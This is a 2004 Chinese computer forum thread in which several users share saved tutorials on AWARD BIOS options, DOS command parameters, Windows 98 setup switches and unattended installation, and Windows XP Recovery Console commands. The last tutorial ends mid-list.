热点科技

标题: 【分享】平时保存的一些教程！ [打印本页]

---

作者: alex22788    时间: 2004-6-11 22:02
标题: 【分享】平时保存的一些教程！
【分享】平时保存的一些教程！
AWARD BIOS设置详解
AWARD BIOS中的有关设置选项的含义和设置方法
在AWARD BIOS的主菜单中主要有以下几个菜单项：
Standard CMOS Setup（标准CMOS设定）：
这个选项可以设置系统日期、时间、IDE设备、软驱A与B、显示系统的类型、错误处理方法等。
（1）在IDE设备设置中，用户可以在Type（类型）和Mode（模式）项设为Auto，使每次启动系统时BIOS自动
检测硬盘。也可以在主菜单中的IDE HDD Auto Detection操作来设置。用户还可以使用User选项，手动设定
硬盘的参数。必须输入柱面数（Cyls），磁头数（Heads），写预补偿（Precomp），磁头着陆区（Landz），
每柱面扇区数（Sectorxs），工作模式（Mode）等几种参数。硬盘大小在上述参数设定后自动产生。
（2）显示类型可选EGA/VGA（EGA、VGA、SEGA、SVGA、PGA显示适配卡选用）、CGA40（CGA显示卡，40列方式）、
CGA80（CGA显示卡，80列方式）、MONO（单色显示方式，包括高分辨率单显卡）等四种，以现在我们使用的
计算机来看，绝大多数都属于EGA/VGA显示类型。
（3）暂停的出错状态选项有：All Errors（BIOS检测到任何错误，系统启动均暂停并且给出出错提示）、
No Errors（BIOS检测到任何错误都不使系统启动暂停）、All But Keyboard（BIOS检测到除了磁盘之外的
错误后使系统启动暂停，磁盘错误暂停）、All But Disk/Key（BIOS检测到除了键盘或磁盘之外的错误后使
系统启动暂停。
BIOS Features Setup（BIOS功能设定）
该项用来设置系统配置选项清单，其中有些选项由主板本身设计确定，有些选项用户可以进行修改设定，
以改善系统的性能。常见选项说明如下：
（1）Virus Warning（病毒警告）：这项功能在外部数据写入硬盘引导区或分配表的时候，会提出警告。
为了避免系统冲突，一般将此功能关闭，置为Disable（关闭）。
（2）CPU Internal Cache（CPU Level 1 catch）：缺省为Enable（开启），它允许系统使用CPU内部的
第一级Cache。486以上档次的CPU内部一般都带有Cache，除非当该项设为开启时系统工作不正常，此项一般
不要轻易改动。该项若置为Disable，将会严重影响系统的性能。
（3）External Cache（CPU Level 1 catch）：缺省设为Enable，它用来控制主板上的第二级（L2）Cache。
根据主板上是否带有Cache，选择该项的设置。
（4）BIOS Update：开启此功能则允许BIOS升级，如关闭则无法写入BIOS。
（5）Quick Power On Self Test：缺省设置为Enable，该项主要功能为加速系统上电自测过程，它将跳过
一些自测试。使引导过程加快。
（6）Hard Disk Boot From（HDD Sequence SCSI/IDE First）:选择由主盘、从盘或SCSI硬盘启动。
（7）Boot Sequence：选择机器开电时的启动顺序。有些BIOS将SCSI硬盘也列在其中，此外比较新的主板
还提供了LS 120和ZIP等设备的启动支持，一般BIOS，都有以下四种启动顺序：C，A（系统将按硬盘，软驱
顺序寻找启动盘）；A，C（系统将按软驱，硬盘顺序寻找启动盘）；CDROM，C，A（系统按CDROM，硬盘，
软驱顺序寻找启动盘）；C，CDROM，A（系统按硬盘，CDROM，软驱顺序寻找启动盘）。
（8）Swap Floppy Drive:（交换软盘驱动器）缺省设定为Disable。当它Disable时，BIOS把软驱连线扭接
端子所接的软盘驱动器当作第一驱动器。当它开启时，BIOS将把软驱连线对接端子所接的软盘驱动器当作
第一驱动器，即在DOS下A盘当作B盘用，B盘当作A盘用。
（9）Boot Up Floppy Seek：当Enable时，机器启动时BIOS将对软驱进行寻道操作。
（10）Floppy Disk Access Contol：当该项选在R/W状态时，软驱可以读和写，其它状态只能读。
（11）Boot Up Numlock Strtus:该选项用来设置小键盘的缺省状态。当设置为ON时，系统启动后，
小键盘的缺省为数字状态；设为OFF时，系统启动后，小键盘的状态为箭头状态。
（12）Boot Up System Speed：该选项用来确定系统启动时的速度为HIGH还是LOW。
（13）Typematic Rate Setting:该项可选Enable和Disable。当置为Enable时，如果按下键盘上的某个键不放，
机器按你重复按下该键对待；当置为Disable时，如果按下键盘上的某个键不放，机器按键入该键一次对待。
（14）Typematic Rate:如果Typematic Rate Setting选项置为Enable，那么可以用此选项设定当你按下键盘
上的某个键一秒钟，那么相当于按该键6次。该项可选6、8、10、12、15、20、24、30。
（15）Typematic Delay：如果Typematic Rate Setting选项置为Enable，那么可以用此选项设定按下某一个
键时，延迟多长时间后开始视为重复键入该键。该项可选250、500、750、1000，单位为毫秒。
（16）Security Option:选择System时，每次开机启动时都会提示你输入密码，选择Setup时，仅在进入BIOS
设置时会提示你输入密码。
（17）PS/2 Mouse Function Control：当该项设为Enable，机器提供对于PS/2类型鼠标的支持，AUTO可以在
系统启动是自动侦测PS/2 Mouse，分配IRQ。
（18）Assign PCI IRQ For VGA:选Enable时，机器将自动设定PCI显示卡的IRQ到系统的DRAM中，以提高显示
速度和改善系统的性能。
（19）PCI/VGA Palett Snoop：该项用来设置PCI/VGA卡能否与MPEG ISA/VESA VGA卡一起用。当PCI/VGA卡与
MPEG ISA/VESA VGA卡一起用或使用其他非标准VGA时，该项应设为Enable。
（20）OS Select For DRAM>64MB：如果使用OS/2操作系统，使用64MB以上的内存。该项选为OS2。
（21）System BIOS Shadow:该选项的缺省设置默认为Enable，当它开启时，系统BIOS将拷贝到系统Dram中，
以提高系统的运行速度和改善系统的性能。
（22）Video BIOS Shadow:缺省设定为开启（Enable），当它开启时，显示卡的BIOS将拷贝到系统DRAM中，
以提高显示速度和改善系统的性能。
（23）C8000－CBFFF Shadow/DFFFF Shadow:这些内存区域用来作为其他扩充卡的ROM映射区，一般都设定为
禁止（Disable）。如果有某一扩充卡ROM需要映射，则用户应搞清楚该ROM将映射地址和范围，可以将上述的
几个内存区域都置为Enable;但这样将造成内存空间的浪费。因为映射区的地址空间将占用系统的640K～1024K
之间的某一段内存。

---

作者: guderain    时间: 2004-6-11 22:03
DOS常用命令参数的中文详解DIR 命令的格式：
dir [D:][PATH][NAME][[/A][:attrib]][/o:[sorted][/l][/c[h]
(1)dir /a:attrib 缺省包含所有文件(系统文件.隐含文件)
attrib[:][h/-h]只显示隐含文件或非隐含文件.
[r/-r]只显示只读文件或非只读文件
[s/-s]只显示系统文件或非系统文件
[a/-a]只显示要归档文件或非归档文件
(2)/o[:]sorted:缺省完全按字母顺序,子目录显示在文件之前
/o[n/-n]:按字母顺序或按文件名顺序/反向显示
[e/-e]:按扩展名字母顺序/反向显示
[d/-d]:按时间顺序/反向显示
[s/-s]:按大小从大到小或/反向显示
[g/-g]:按子目录先于文件或文件先于子目录
(3)/s 参数:对当前目录及其子目录中所有文件进行列表
例子:dir /s/a/o:n c:\&gtRN
将c盘上的所有子目录和文件按隶属关系并根据子目录和文件字母顺序打印输出
(4)/B 参数:将只显示文件名与扩展名
(5)/L 参数:将全部用小写字母对文件或子目录进行列表
训练:
dir /a 列当前目录所有文件(含隐含及系统文件)
dir /ah 列隐含文件(包含子目录(隐含的) dir /a-h
dir /as 列系统文件 dir /a-s
dir /ad 列子目录 dir /a-d
dir /o 按字母顺序
dir /B 只显示文件名与扩展名
二、attrib [+r|-r] [+a|-a] [+s|-s] [+h|-h] [d: ] [name]
缺省 attrib name 显示文件的(文件)属性
attrib io.sys (或子目录)
shr c:\ io.sys 指定为系统(s) 隐含(h) 只读(r)文件
也可以attrib *.sys 显示扩展名为sys的文件属性
参数 [+r|-r] 将文件属性设置或解除 只读属性
[+a|-a] 将文件属性设置或解除 归档属性
[+h|-h] 将文件属性设置或解除 隐含属性 (尤其对子目录也起作用)
/s 参数 将当前及当前子目录下的所有文件均起作用
可以用来查找文件
例子:
attrib news86 列news86的文档属性
attrib +r report.txt 设置为只读 attrib -s -h record.txt
attrib +a a:*.*
attrib -a a:*.bak
xcopy a: b: /a 将A盘上的所有标志为"归档"属性的文件拷到B盘
xcopy a: b: /m 将A盘上的所有文件拷到B盘后并移去归档属性
三、cd 介绍: cd...返回上二级目录 "."代表当前目录 "."代表父目录
cd ..\..返回到上级目录的父目录(祖目录)
cd A:\ 将A盘的当前目录改为根目录
cd A:\xx 将A盘的当前目录改为子目录xx下
cd ..\98 先返回父目录,再进入父目录下的98子目录
cd ..返回到父目录
cd\98 进入根目录下的98子目录
四、copy [/y][/-y][/v][ /B]
copy /y 不加提示,对所有文件加以覆盖
/-y 加以提示,对所有文件 (yes或no提问 )
/v 拷贝以后加以校验
/B 按二进制进行显示
copy w1.wps con/b 可以将wps文件在屏幕上显示,而不必进入wps状态
copy ..\98 将父目录下的98子目录下的所有文件全拷到当前子目录
copy .\97 当当前目录下的97子目录下文件全部拷到当前目录
copy . c:\ 将当前目录下的所有文件拷到c盘根目录
. 意味着 *.* 文件
copy nul a.abc 将a.abc 文件清空(文件长度改为0)
copy 文件名+con 向文本文件中追加命令或内容
copy con 文件名 创建文本文件(F6存盘退出)
copy con prn 检测打印机的开关
五、xcopy命令
xcopy [source] [d:date]

[/e] [/v] [/y]
xcopy [d:date] xcopy a:b:\ /d:08/18/98/s/v 拷贝98.08.18年后的文件
xcopy

提示创建子目录
xcopy 连带子目录一起拷贝. 注意:若目标盘上不存在此子目录,而在目标
盘的结束符又不以"\"为结束,则将提示:
does destination specify a file name or directory name on the target
[f=file,d=directory]?
在目标盘上创建文件[按下]还是创建子目录[按下d] ?应选择d键
xcopy[/v] 带较验
*1) xcopy 不拷贝系统和隐含文件,应先予以修改属性再拷贝
xcopy [/y] 覆盖时是否有提示, /y 不带提示
若省略目标盘或子目录名,则拷贝到当前目录下
六、 del /p
加/p 可以在删除前是否提示
如del后加子目录名,则将子目录下所有文件(隐含.系统.只读文件除外)全删除,
加/p则可以确认.
七、undelete [name] /au
不加提示地将所有满足条件的文件恢复(能够恢复的),并将首字母置成"#",若已
存在,则按"# % & 0 1 2-9 a-z"顺序加上.
如:undelete *.dbf/au 将扩展名为"dbf"的文件全恢复,并以"#"开头,作为文件
名, /list 仅列出可恢复的文件,而不恢复
undelete /load 将undelete装入内存
/unload 将undelete卸出内存
/s[drive]对指定驱动器进行监测管理
undelete/sc
将 undelete驻留内存,?并创建一个隐含的sentry 子目录对c盘删除的文件进行
管理 undelete/ds 恢复
相应恢复命令可以用undelete即可完整恢复出文件名(非常完整)
最常用undelete *.*
deltree /y [drive:path]
deltree 删除子目录及文件,尽管有些文件是系统文件或隐含文件
它可以带有通配符,带有通配符时,它将删除符合条件的文件及子目录
如:?undelete *.dbf/au 将扩展名为"dbf"的文件全恢复,并以"#"开头作为文件
名.
/list 仅列出可恢复的文件,而不作恢复操作.
undelete/load 将undelete 装入内存.
/unload将undelete 卸出内存.
/s[drive] 对指定的驱动器进行监视管理.
undelete/sc 将undelete 驻留内存,并创建一个隐含的sentry子目录对C盘删除
的文件进行管理.相应恢复命令可以用undelete/ds 即可完整恢复出文件名(很完善).
最常用的是undelete *.*
八、deltree /y [drive:path]
deltree 删除子目录及文件,尽管有些文件是系统或隐含的.
它可以带有通配符,这时它将删除符合条件的文件或子目录.
如:存在L1文件,L2子目录,L3文件,L4子目录
deltree L*.* 将删除以上所有的文件和子目录,但在删除前加以确认,若不删除,
可以输入"N".
/y 参数是在删除时不加以确认就进行操作的.
它删除的文件可以用undelete恢复,?但不能恢复子目录及其下的文件,可以用特
殊工具.如NORTON 8.0 等.
若提前使用了undelete/s,?则可以在sentry子目录下找到完整的文件,但名已经
改变了.
九、dos=high[|low[umb|noumb]]
dos=high,umb 则dos将自身装入高端内存(high)并能管理上位内存(umb).
noumb 则不管理上位内存.
在写入dos=high及umb 前应装入device=himem.sys
为了将程序或驱动程序装入上位内存,必须使用dos=umb,可省出大部分常规内存.
可以在config.sys的任何位置写上dos=high,umb
若显示hma not avoiable 或 load down low 则表明不能使用高端内存.
十、doskey 记录以前敲过的dos命令,可以用F7来显示,用"↑↓"来选择,用F9来输入
选择的命令号.
doskey/restall 重新装入一次,以前的命令行撤消.
doskey/history 显示内存中所有的命令,可以">"显示到其它文件中,缩写"/H".
doskey dir=cls 则击入dir等同于cls一样.
doskey/macros 可显示所有的宏定义,可使用">"重定义到文件中,可缩写"/M".
doskey dir= 可撤消对dir 的宏定义.
doskey p=dir$tdir*.exe/p$tdir c:\t$tdir c:\t$*
$t为命令的区分符,而$*为命令的结束符
doskey/insert(overstrike)?在重新输入命令时,对旧命令的修改是插入还是覆
盖状态(默认).
十一、emm386.exe
提供对扩展内存的管理,使应用程序象使用常规内存一样能够使用它.
常见的用法是 在config.sys 中
device=c:\dos\himem.sys
device=c:\dos\emm386.exe ram d=64 将DMA 内存数量设置为64K
noems 提供对上位内存的访问,但不提供对扩展内存的访问.
应注意的是在windows中最好不要用它,因为windows本身有对扩展内存进行管理
的程序.应采用windows中的管理器.
十二、fc 命令 fc/b dt.dat dt2.dat>b (作二进制代码比较)
比较两个文件,一般用作存取进度,修改游戏存储文件用.
实际代码位置应加上0100 如:0000 05E4:00 67
实际用debug -e 修改时应加上0100 即 0000 06E4:00 67
后面加上重定向文件"&gt" 可以将比较结果输出到p文件中.
十三、format /q /u /s /n:sectors /f:size /c
/q参数:快速格式化,仅扫描文件分配表和根目录区,仅对格式化过的磁盘有效.
使用时应确保格式化过后没有增加新的坏道.
/u参数:无条件格式化,并且不保存原来盘上的信息,可以防止"unformat".
/s参数:格式化为系统盘,也可以使用"sys"命令.
/f:size size 可以为160 180 320 360 720 1200 1440 2800
/n:sector n可以为1 格式为单面盘,容量为160k 180k
可以为4 可以在5寸高密驱动器上格式化360k磁盘
可以为8 可以在5寸高密驱动器上进行8个扇区的格式化.
/c 重新测试坏扇区,缺省时如果一个扇区标记为"坏",以后格式时就不在从新测
试,仅作标记,使用"/C"时可以从新测试.
十四、unformat 命令
对用format 格式过,且未用"/u"参数的命令起作用,用它可以来重新修复已经损
坏的硬盘分区表,但对网络盘不起作用.
unformat drive:[/l][/test]

/l 显示每一个被unformat发现的文件和子目录,如果没有这个开关,只显示那些
破碎的文件和子目录,可以用ctrl+s 暂停,按任意键继续.
/test 仅作一个测试,不作实际的修复工作,作模拟过程.
/p 一边测试一边打印.
注:这种方法不能保证修复所有的文件,尤其是格式化后又添加过数据的磁盘.
恢复后的文件依次存放在subdir1....2....3等子目录中。

---

作者: wzg45a    时间: 2004-6-11 22:04
Win98的所有安装参数
Win98的所有安装参数
/? setup命令的部分命令行参数的使用及语法的有关帮助。

/C 不安装Smartdrive磁盘缓存。
/D 忽略现有版本Windows的初始设置。如果用户是在Windows系统文件缺少或损坏时重新安装Windows时可使用该参数。
/DOMAIN: domain_name 设置Microsoft网络用户的Windows NT的合法登录域名为domain_name。
/F 忽略在文件名的本地缓存中寻找文件。这样虽然安装时间稍长，但却占用极少的内存。
/IA 不运行Setup.inf文件中的[AfterProvider]节。
/IB 不运行Setup.inf文件中的[BeforeProvider]节。
/IC 如果使用该参数并未设置RMDrivers=1，则启动时不运行Config.sys/Autoexec.bat文件。
/ID 忽略检查安装Windows98所需的最小磁盘空间。
/IE 不创建启动盘。如使用此参数，则相应也不创建windows\command\ebd文件夹。
/IF 快速安装。
/IG 允许在一些含较早版本BIOS的Gateway和Micro计算机上运行Setup。
/IH 在显著位置运行Scandisk。使用该参数有利于用户在运行Scandisk过程中或发生错误时清楚了解运行结果。
/IL 安装Logitech鼠标驱动。如果用户使用的是Logitech Series C鼠标，可使用该参数。
/IM 忽略对低位常规内存的检查
/IN 不执行网络安装程序。跳过网络软件和网络设置画面显示。
/IQ 不检查交叉链接文件。
/IR 不更新主引导纪录（MBR）。
/IS 不运行Scandisk。
/IV Windows升级安装时跳过显示安装画面。
/M 跳过安装时音频（.wav）文件的播放。
/N 没有鼠标时运行Setup。
/NA#
# =0 缺省
# =1 不检查基于Windows的程序，排列基于MS-DOS的程序
# =2不检查基于MS-DOS的程序，排列基于的Windows程序
# =3不检查基于Windows和MS-DOS的程序
/ND 忽略Migration.dll文件，并强制Windows98覆盖较新的文件
/NF 在“复制Windows98文件至你的计算机”结束后，不显示“从驱动器A中移去软盘”。一般在用户用可启动光盘安装Windows98时使用该参数。等价于在Msbatch.inf文件中设置BootCD=1。
/NH 在Windows95用户界面运行Setup时，不运行Hwinfo.exe。
/nm 忽略检查运行Windows98所需的最低要求处理器（66MHz 486）。
/NOSTART 复制安装Windows98所需的动态链接库文件(DLLs)的最小安装版本，然后不安装Windows98而直接退回MS-DOS状态。
/NR 忽略注册表检查。
/NX 不检查正在运行的Setupx的版本。
/PI 保留硬件的特定设置（硬件未使用缺省设置）。有的版本的BIOS要求硬件根据特定的设置工作。默认情况下，Setup删除硬件的特定设置从而造成部分硬件不能正常工作。
/PJ 默认安装Advanced Configuration and Power Interface (ACPI)
/script_filename 使用指定位置的包含安装选项的宏文件自动安装Windows98。
/SRCDIR 指定Windows98安装文件的初始目录
/S filename 安装时装载指定的SETUP.INF文件。
/T:tempdir 为安装程序指定复制临时文件的目录。如果目录不存在，将自动创建该目录。若该目录存在，则此目录中的任何旧文件都将被删除。
/U:UPI 指定UPI
/IV 在安装过程跳过公告板显示
/IW 在安装过程跳过许可协议显示
/IX 忽略字符集检查
setup/p j 能加上高级电源管理

---

作者: zml1982    时间: 2004-6-11 22:05
怎样自动安装WINDOWS98
怎样自动安装WINDOWS98
　首先安装 Batch 98 ，方法：打开 Windows 98 光盘，找到tools\reskit\batch\
　　执行该目录下的 Setup.exe 即可进行 Batch 98 的安装
　　安装好后，到「开始」>>「程序」执行「Microsoft Batch 98」，就可以进行安装自动化的设定。

　　一、自动收集
启动之后，先按「自动收集」，以取得你目前这台计算机上的登录文件资料（分辨率、打印机、时区、用户安全设定值、目前的 Windows 目录、网卡设定值、目前的用户机器名称、所有 Microsoft 32 bit 网络附件设定值..等等）。注意：如果是想在不同机器上安装请跳过这步
二、系统设定值

　　在系统设定的部分，会有五个设定项目：一般安装选项、网络选项、选项附件、Internet Explorer 选项、高级选项。

　　请依照你自己的需要，来依次提供各项目中，在安装时所需要的详细资料，例如在「常规安装选项」你就可以输入产品安装序号、用户信息..等等。
　　不是每一项都要填，如果你觉得你提供的信息已经足够给批次安装时所使用，就可以直接按「将设定值储存到 INF」，结束 Batch 98。

　　三、储存设定值
　　当你需要的所有项目都设好之后，就按「将设定值储存到 INF」，Batch 98 会依据你所提供的资料，自动建立一个 script 文件（.inf），以提自动化安装时使用。预设文件名是 msbatch.inf，文件名当然可以照你的喜好随取，不过扩展名一定是 .inf，习惯上，都是把这个 inf 文件存到磁盘上，因为，我们就很方便的可以拿到别台计算机上使用。

　　四、如何使用批次安装文件（.inf）
　　建立好的 inf 文件，要如何使用呢？在 SETUP 指令之后指定你的 inf 文件完整路径与文件名即可，例如，你的安装批处理文件 msbatch.inf 是在磁盘 A 上，就是：
　　setup a:\msbatch.inf

　　五、如果同时要安装很多台计算机
　　例如你是 MIS 人员，要负责安装部门里所有的计算机，这时候，每一台计算机的名称就可能都不一样（例如这些计算机名称要为 Alex、David、Printer、Coco....）、IP 也不一样，「批处理安装」怎么解决这个问题呢？（请先执行前面 一、二 的步骤）

先建立一个纯文字的 .txt 文件，每一行输入一个计算机名称，并以按 enter 换行，如果需要 IP 地址，IP 地址在机器名称的同一行上，以「,」逗号区隔，如下面这样的范例。（在这个范例中，我们只给 Alex 跟 David_nb 的计算机设了 IP）
　　Alex,168.192.0.1Nono_workDavid_nb ,168.192.0.2Zux
　　开启 Batch 98 后，选择「文件」>>「储存多个机器名称」，按「指定文件名称」，选择你先前建立好的、包含有机器名称的 .txt 文件。
　　再按「储存目的地」，这是选择 INF 文件所存放的目录，例如你的 INF 文件要放在磁盘 A，就指向到磁盘 A。（在选择目标目录的时候，会出现个文件名称，不用理它，选好目录按确定即可）

　　按储存，按关闭。
　　Bath 98会依照 .txt 里的计算机名称，依序对应建立 .inf 文件，文件名是从 BSTP0001.INF 可以一直到 BSTP9999.INF 为止。
以上面为例：Alex 的计算机的安装信息都在 BSTP0001.INF，Nono_work 的计算机安装信息都在文件 BSTP0002.INF，依此类推，这些 inf 文件的使用方法，比照步骤四。
　　几点要提醒：
　　·计算机名称不建议使用中文。
　　·如果建立名称文件时，资料输入不正确，Windows 安装程序便会停下来，等待你输入正确的信息。
　　·自动安装不会提示你移除软驱中的磁盘，在安装程序重新启动计算机之前，记得拿开软驱中的磁盘。
　　·批处理安装无法略过「寻找前一版 Windows 的信息」（如果你是 upgrade 安装的话）
　　·如果磁盘检查有错误，批处理安装也会停下来，等待你的指示

---

作者: qwedsaqu    时间: 2004-6-11 22:06
windows xp的控制台命令详解
在 Windows XP 系统中，把XP的安装CD放入光驱，点击“开始”——“运行”，输入“X:\I386\WINNT32.EXE /cmdcons”，回车。（注:X为光驱）


Attrib

　　更改单个文件或目录的属性。该命令设置或删除指派给文件或目录的只读、系统、
存档、隐藏以及压缩属性。
　　含有下列参数的 attrib 命令仅当使用故障恢复控制台时才可用。含有不同参数
的 attrib
命令可在命令提示符中使用。
　　attrib [ +r|-r] [ +s|-s] [ +h|-h] [ +c|-c] [ [ drive:] [ path] filename]
　　参数
　　+r　　设置只读属性。
　　-r　　清除只读属性。
　　+s　　设置系统属性。
　　-s　　清除系统属性。
　　+h　　设置隐藏属性。
　　-h　　清除隐藏属性。
　　+c　　设置压缩属性。
　　-c　　清除压缩属性。
　　[ [ drive:] [ path] filename]
　　指定要处理的目录或文件的位置和名称。可以一次只更改一个文件，也可以更改
整个目录。
　　注意：可以用一个命令更改一个文件或目录的多个属性。

　　Batch
　　执行在文本文件中指定的命令。batch 命令仅在使用故障恢复控制台时才可用。
故障恢复控制台可以从安装 CD 中启动。
　　batch input_file [ output_file]
　　参数
　　input_file
　　指定包含要执行的命令列表的文本文件。Input_file 可以由驱动器号和冒号、
目录名、文件名或它们的组合构成。
　　output_file
　　如果指定，则在命名文件中存储命令输出。如果没有指定，输出将显示在屏幕上。
　　范例
　　下例将执行批处理文件 C:\ Jobs\ Find.txt 并将输出存储在文件 C:\ Jobs\
Results.txt 中：
　　batch c:\ jobs\ find.txt c:\ jobs\ results.txt
　　注意：批处理文件不能包含嵌套的 batch 命令。

　　Chdir (Cd)
　　显示当前目录的名称，或更改当前的文件夹。
　　含有下列参数的 chdir 命令仅在使用故障恢复控制台时才可用。可在命令提示符
下使用带有不同参数的 chdir 命令。
　　chdir [drive:] [path] [ ..]
　　或者
　　cd [drive:] [ path] [ ..]
　　参数　　无
　　如果不带任何参数，chdir 将显示当前驱动器和文件夹的名称。只与驱动器号一
起使用（例如 cd C:），chdir 将显示指定驱动器上的当前目录。
　　[ drive:] [ path]
　　指定要改到的驱动器（如果不是当前驱动器）和目录。
　　[ ..]
　　指明要改到父文件夹。在 chdir 和两个句点之间插入一个空格。
　　注意
　　　· Chdir 将空格视作分隔符。用引号将包含空格的目录名扩起来。例如：
　　　　cd "driver cache"
　　　· Chdir 只适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的
根目录或本地安装源。

　　Copy
　　将单个文件复制到其他位置。含有下列参数的 copy 命令仅在使用故障恢复控制
台时才可用。
　　可在命令提示符下使用带不同参数的 copy 命令。
　　copy source [ destination]
　　参数
　　source
　　指定要被复制的文件的位置和名称。Source 可由驱动器号和冒号、目录名、文
件名或组合所组成。

　　destination
　　指定要复制到其中的文件或文件集的位置和名称。Destination 可以由驱动器
号和冒号、文件夹名、文件名及组合而组成。
　　注意
　　　· 源可以是可移动媒体、当前 Windows 安装的系统目录中的任何目录、驱
动器的根目录、本地安装源或 Cmdcons 目录。
　　　· 目标可以是除可移动媒体以外的任何与源相同的位置。如果没有指定目
标，则默认为
当前目录。
　　　· Windows 安装 CD 中的压缩文件在复制过程中解压缩。
　　　· Copy 不支持通配符。

　　Delete (Del)
　　删除单个文件。含有下列参数的 delete 或 del 命令仅在使用故障恢复控制台时
才可用。可在命令提示符下使用带有不同参数的 delete 或 del 命令。
　　delete [ drive:] [ path] filename
　　或者
　　del [ drive:] [ path] filename
　　参数
　　[ drive:] [ path] filename指定要删除的文件的位置和名称。
　　注意
　　　· Delete 只适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的
根目录或本地安装源。

   Dir
　　显示目录中的文件和子目录列表。含有下列参数的 dir 命令仅在使用故障恢复
控制台时才可用。可在命令提示符下使用带有不同参数的 dir 命令。
　　dir [ drive:] [ path] [ filename]
　　参数
　　[ drive:] [ path]
　　指定要查看列表的驱动器和目录。
　　[ filename]
　　指定要查看列表的特定文件或一组文件。可以使用多个文件名。文件名可以用空
格、逗号或分号隔开。可以在 filename 参数中使用通配符（?和 *）显示一组文件。
　　Dir 还列出磁盘的卷标和序列号，以及所列文件的数目，累计大小和磁盘上剩余
的可用空间（以字节计）。对于每个文件和子目录而言，dir 列出文件的扩展名、文
件字节数、文件的最后修改日期和时间以及下列文件属性（如果可用）：
　　缩写　属性
　　 d　　目录
　　 h　　隐藏文件
　　 s　　系统文件
　　 e　　加密
　　 r　　只读
　　 a　　存档文件
　　 c　　已压缩
　　 p　　重新分析点
　　注意：
　　Dir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或
本地安装源。

　　Expand
　　从压缩文件中提取文件。通过该命令可从 .cab 文件或压缩文件中提取驱动程序
文件。
　　含有下列参数的 expand 命令仅在使用故障恢复控制台时才可用。可在命令提示符
下使用带有不同参数的 expand 命令。
　　expand source [ /F:filespec}] [ destination] [ /d] [ /y]
　　参数

　　source
　　指定要展开的文件。如果源文件只包含一个文件，请使用该选项。source 可由驱动
器号和冒号、目录名、文件名或组合所组成。不能使用通配符。
　　/f:size
　　如果源文件包含多个文件，指定要提取的文件的名称。可以对要提取的文件使用通
配符。
　　destination
　　指定提取文件或每个单独文件的目标目录和（或）文件名。
　　/d
　　列出 CAB 文件中包含的文件而不展开或提取。
　　/y
　　在展开或提取文件时不出现覆盖提示。
　　范例
　　下例将从安装 CD 上的驱动程序 CAB 文件中提取 Msgame.sys 文件并将其复制到
C:\ Windows\ System\ Drivers：
　　expand d:\ i386\ driver.cab \ f:msgame.sys c:\ windows\ system\ drivers
　　下例将展开压缩文件 Access.cp_：
　　expand d:\ i386\ acces.cp_c:\ windows\ system32\ access.cpl
　　下例将列出安装 CD 上的驱动程序 CAB 文件中的所有文件。
　　expand /d d:\ i386\ driver.cab
　　要点
　　　· 驱动程序 CAB 文件包含成千上万的文件，其中包括由 Windows 提供的大部分
驱动程序。将所有文件从 CAB 文件展开到硬盘上需要花较长的时间和大量的磁盘空间。
建议 仅从该文件中提取需要的文件。
注意
　　　· 如果没有指定目标，文件将被复制到当前目录。
　　　· 不能将软盘驱动器或 CD-ROM 等可移动媒体指定为目标。

　　Mkdir (md)
　　创建目录或子目录。含有下列参数的 mkdir 命令仅在使用故障恢复控制台时可用。
可在命令提示符下使用带不同参数的 mkdir 命令。
　　mkdir [ drive:] path
　　或者
　　md [ drive:] path
　　参数
　　drive:
　　指定要创建新目录的驱动器。
　　path
　　指定新目录的名称和位置。不能使用通配符。
　　注意
　　　· Mkdir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根
目录或本地安装源。

　　Rename (Ren)
　　更改单个文件的名称。含有下列参数的 rename 命令仅在使用故障恢复控制台时可
用。可在命令提示符下使用带不同参数的 rename 命令。
　　rename [ drive:] [ path] filename1 filename2
　　或者
　　ren [ drive:] [ path] filename1 filename2
　　参数
　　[ drive:] [ path] filename1
　　指定要重新命名的文件的位置和名称。不能使用通配符。
　　filename2
　　为文件指定新的名称。重新命名文件时不能指定新的驱动器或路径。

　Rmdir (Rd)
　　删除目录。含有下列参数的 rmdir 命令仅在使用故障恢复控制台时可用。可在命令
提示符下使用带不同参数的 mdir 命令。
　　rmdir [ drive:] path
　　或者
　　rd [ drive:] path
　　参数
　　[ drive:] path
　　指定要删除的目录的位置和名称。不能使用通配符。
　　注意
　　　· 目录必须为空否则命令失败。
　　　· Rmdir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根
目录或本地安装源。

　　Type
　　显示文本文件的内容。使用 type 或 more 命令查看文本文件而不修改文件。含有
下述参数的 type 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同
参数的 type命令。
　　type [ drive:] [ path] filename
　　或者
　　more [ drive:] [ path] filename
　　参数
　　[ drive:] path] filename
　　指定要查看的文件的位置和名称。
　　如果使用 NTFS 驱动器而且文件名包含空格，则必须用引号 (")将文件名引起来。

　　More
　　显示文本文件的内容。使用 more 或 type 命令查看文本文件而不修改文件。含有
下列参数的 more 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同
参数的 more命令。
　　more [ drive:] [ path] filename
　　或者
　　type [ drive:] [ path] filename
　　参数
　　[ drive:] path] filename
　　指定要查看的文件的位置和名称。
　　如果使用 NTFS 驱动器，而且文件名包含空格，则必须用引号 (")将文件名引起来。

  　Bootcfg
　　bootcfg 命令启动配置和故障恢复（对于大多数计算机，即 boot.ini 文件）。
　　含有下列参数的 bootcfg 命令仅在使用故障恢复控制台时才可用。可在命令提示符
下使用带有不同参数的 bootcfg 命令。
　　用法:
　　bootcfg /default　　设置默认引导项。
　　bootcfg /add　　　　向引导列表中添加 Windows 安装。
　　bootcfg /rebuild　　重复全部 Windows 安装过程并允许用户选择要添加的内容。
　　注意：使用 bootcfg /rebuild 之前，应先通过 bootcfg /copy 命令备份
boot.ini 文件。

　　bootcfg /scan　　　 扫描用于 Windows 安装的所有磁盘并显示结果。
　　注意：这些结果被静态存储，并用于本次会话。如果在本次会话期间磁盘配置发生
变化，为获得更新的扫描，必须先重新启动计算机，然后再次扫描磁盘。
　　bootcfg /list　　　列出引导列表中已有的条目。
　　bootcfg /disableredirect 在启动引导程序中禁用重定向。
　　bootcfg /redirect [ PortBaudRrate] |[ useBiosSettings]
　　在启动引导程序中通过指定配置启用重定向。
　　范例：
　　bootcfg /redirect com1 115200
　　bootcfg /redirect useBiosSettings


　　hkdsk
　　创建并显示磁盘的状态报告。Chkdsk 命令还可列出并纠正磁盘上的错误。
